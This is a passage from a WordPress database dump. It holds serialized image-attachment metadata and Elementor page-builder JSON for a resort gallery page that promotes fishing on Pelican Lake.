s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2933,920,'_wp_attached_file','2019/09/67328366_2527420747321795_418456610654912512_n-1.jpg'),(2934,920,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:60:\"2019/09/67328366_2527420747321795_418456610654912512_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"67328366_2527420747321795_418456610654912512_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:60:\"67328366_2527420747321795_418456610654912512_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:60:\"67328366_2527420747321795_418456610654912512_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2935,921,'_wp_attached_file','2019/09/67352508_2527420803988456_3782830344743419904_n-1.jpg'),(2936,921,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/67352508_2527420803988456_3782830344743419904_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"67352508_2527420803988456_3782830344743419904_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"67352508_2527420803988456_3782830344743419904_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"67352508_2527420803988456_3782830344743419904_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2937,922,'_wp_attached_file','2019/09/67354008_2515260805204456_2096376990331305984_n-1.jpg'),(2938,922,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/67354008_2515260805204456_2096376990331305984_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"67354008_2515260805204456_2096376990331305984_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"67354008_2515260805204456_2096376990331305984_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"67354008_2515260805204456_2096376990331305984_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2939,923,'_wp_attached_file','2019/09/67664725_2541790915884778_4081940006199885824_n-1.jpg'),(2940,923,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/67664725_2541790915884778_4081940006199885824_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"67664725_2541790915884778_4081940006199885824_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"67664725_2541790915884778_4081940006199885824_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"67664725_2541790915884778_4081940006199885824_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2941,924,'_wp_attached_file','2019/09/68253286_2541791669218036_4028006804783890432_n.jpg'),(2942,924,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:59:\"2019/09/68253286_2541791669218036_4028006804783890432_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"68253286_2541791669218036_4028006804783890432_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:59:\"68253286_2541791669218036_4028006804783890432_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:59:\"68253286_2541791669218036_4028006804783890432_n-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2943,925,'_wp_attached_file','2019/09/68430101_2559605910769945_1401026565407506432_n-1.jpg'),(2944,925,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/68430101_2559605910769945_1401026565407506432_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"68430101_2559605910769945_1401026565407506432_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"68430101_2559605910769945_1401026565407506432_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"68430101_2559605910769945_1401026565407506432_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2945,926,'_wp_attached_file','2019/09/68746823_2568210933242776_9006306614507995136_n-1.jpg'),(2946,926,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/68746823_2568210933242776_9006306614507995136_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"68746823_2568210933242776_9006306614507995136_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"68746823_2568210933242776_9006306614507995136_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"68746823_2568210933242776_9006306614507995136_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2947,927,'_wp_attached_file','2019/09/69157175_2573526889377847_7240689118680711168_n-1.jpg'),(2948,927,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/69157175_2573526889377847_7240689118680711168_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"69157175_2573526889377847_7240689118680711168_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"69157175_2573526889377847_7240689118680711168_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"69157175_2573526889377847_7240689118680711168_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2949,928,'_wp_attached_file','2019/09/69361252_2574110649319471_116474079933890560_n-1.jpg'),(2950,928,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:60:\"2019/09/69361252_2574110649319471_116474079933890560_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"69361252_2574110649319471_116474079933890560_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:60:\"69361252_2574110649319471_116474079933890560_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:60:\"69361252_2574110649319471_116474079933890560_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2951,929,'_wp_attached_file','2019/09/69664187_2573526932711176_8178756056831229952_n-1.jpg'),(2952,929,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:61:\"2019/09/69664187_2573526932711176_8178756056831229952_n-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"69664187_2573526932711176_8178756056831229952_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:61:\"69664187_2573526932711176_8178756056831229952_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:61:\"69664187_2573526932711176_8178756056831229952_n-1-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2953,930,'_wp_attached_file','2019/09/69361252_2574110649319471_116474079933890560_n-2.jpg'),(2954,930,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:60:\"2019/09/69361252_2574110649319471_116474079933890560_n-2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"69361252_2574110649319471_116474079933890560_n-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:60:\"69361252_2574110649319471_116474079933890560_n-2-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:60:\"69361252_2574110649319471_116474079933890560_n-2-200x182.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2957,931,'_wp_page_template','default'),(2958,931,'_elementor_template_type','post'),(2959,931,'_elementor_version','2.5.16'),(2960,931,'_elementor_edit_mode','builder'),(2961,931,'_elementor_data','[{\"id\":\"817ef92\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c401d8f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2ff6c4b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"49298b4\"}]},\"elements\":[{\"id\":\"c96dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a80f0a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0dfcb72\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b411014\"}]},\"elements\":[{\"id\":\"49aeb2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>CATCH SOME MEMORIES<\\/strong><\\/p><p>Pelican Lake is a 4,000 acre lake with miles of interesting bays and coves to fish and explore. Pelican Lake is an excellent fishing lake for Northern, Walleye, Bass, and panfish.<\\/p><p><strong>JUST TAKE A LOOK<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ad465b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e6fdf6e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da0a732\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"44985af\"}]},\"elements\":[{\"id\":\"9149cb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bfdc6a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1d42d7f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4dcd77d\"}]},\"elements\":[{\"id\":\"5c5e069\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/69361252_2574110649319471_116474079933890560_n-2.jpg\",\"id\":930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"23a1c70\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"809c09a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9b21bea\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d145579\"}]},\"elements\":[{\"id\":\"b8e3110\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/69664187_2573526932711176_8178756056831229952_n-1.jpg\",\"id\":929}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d36d5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"55a7e23\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3c5afb7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b04fbfb\"}]},\"elements\":[{\"id\":\"f6ec988\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/69157175_2573526889377847_7240689118680711168_n-1.jpg\",\"id\":927}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c95dd54\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7c0d15d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"387c710\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a8a1ddd\"}]},\"elements\":[{\"id\":\"c2896d1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/68746823_2568210933242776_9006306614507995136_n-1.jpg\",\"id\":926}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"668445d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e5f24f9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5ab0e47\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"430173f\"}]},\"elements\":[{\"id\":\"e575265\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6ee7655\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61be359\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86050f1\"}]},\"elements\":[{\"id\":\"de42909\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/20160522_070826.jpg\",\"id\":371},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"df5f462\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5aa2626\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"48945bf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3f4ba65\"}]},\"elements\":[{\"id\":\"e432149\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/68430101_2559605910769945_1401026565407506432_n-1.jpg\",\"id\":925}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1cc6404\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ad7d8d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad470d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86f8da6\"}]},\"elements\":[{\"id\":\"06051df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-009.jpg\",\"id\":340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ad64e1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9407d0d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9681148\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4cb9f69\"}]},\"elements\":[{\"id\":\"a15b9be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2026256\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"07237f5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f6e053a\"}]},\"elements\":[{\"id\":\"bc25866\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-012.jpg\",\"id\":341}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f546c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"164367c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61d1cf0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fe02551\"}]},\"elements\":[{\"id\":\"8db9738\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/ResortPics.jpg\",\"id\":308}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d234255\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"421963b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"545c59d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3b08ea5\"}]},\"elements\":[{\"id\":\"aac74de\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Kussatz.jpg\",\"id\":298}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"997b9fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3e8b38a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc5e9d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"47e0a38\"}]},\"elements\":[{\"id\":\"e54b73a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/06\\/DSCN2502.jpg\",\"id\":204}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c97804\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11a63fa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e62a9be\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8f107cf\"}]},\"elements\":[{\"id\":\"509de7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"299a10a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e4da443\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26eb2dd\"}]},\"elements\":[{\"id\":\"6793696\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3601.jpg\",\"id\":169}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"76d42c8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2605.jpg\",\"id\":176}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f0e6f3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94d196a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6775c1a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c1eb986\"}]},\"elements\":[{\"id\":\"95541c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3611.jpg\",\"id\":170}},\"elements\":[],\"widgetType\":\"image\"},{\